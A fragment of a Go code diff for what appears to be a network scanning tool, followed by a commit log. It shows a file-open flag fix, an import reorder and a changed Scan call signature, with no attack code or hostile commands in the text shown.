-	fl, err := os.OpenFile(filename, os.O_APPEND|os.O_CREATE, 0777)
+	fl, err := os.OpenFile(filename, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0777)
 	if err != nil {
 		fmt.Println(err)
 		return
--- a/main.go
+++ b/main.go
@@ -1,8 +1,8 @@
 package main

 import (
-	"./Plugins"
 	"./common"
+	"./Plugins"
 	"fmt"
 )

@@ -11,7 +11,7 @@ func main() {
 	var Info common.HostInfo
 	common.Flag(&Info) 	//fmt.Println(Info.Host,Info.Ports)
 	common.Parse(&Info)
-	Plugins.Scan(&Info)
+	Plugins.Scan(Info)
 	fmt.Println("scan end")
 }
Author	SHA1	Message	Date
shadow1ng	1a8b884d63	update icmp threads	2020-11-16 19:55:11 +08:00
shadow1ng	468c2a0ff9	update icmp threads	2020-11-16 19:55:00 +08:00
shadow1ng	f8285de94d	update	2020-11-16 13:17:59 +08:00
shadow1ng	8dc8b6e652	update	2020-11-16 09:51:41 +08:00
shadow1ng	a1900086d6	update	2020-11-15 23:36:53 +08:00
shadow1ng	a829660205	update	2020-11-15 22:21:52 +08:00
shadow1ng	2343fc1cfb	update	2020-11-15 22:19:44 +08:00
shadow1ng	43d41844a9	update	2020-11-15 22:19:01 +08:00
shadow1ng	cdbd1aebc2	update	2020-11-15 22:17:57 +08:00
shadow1ng	38fc6dd0c3	update	2020-11-14 10:07:44 +08:00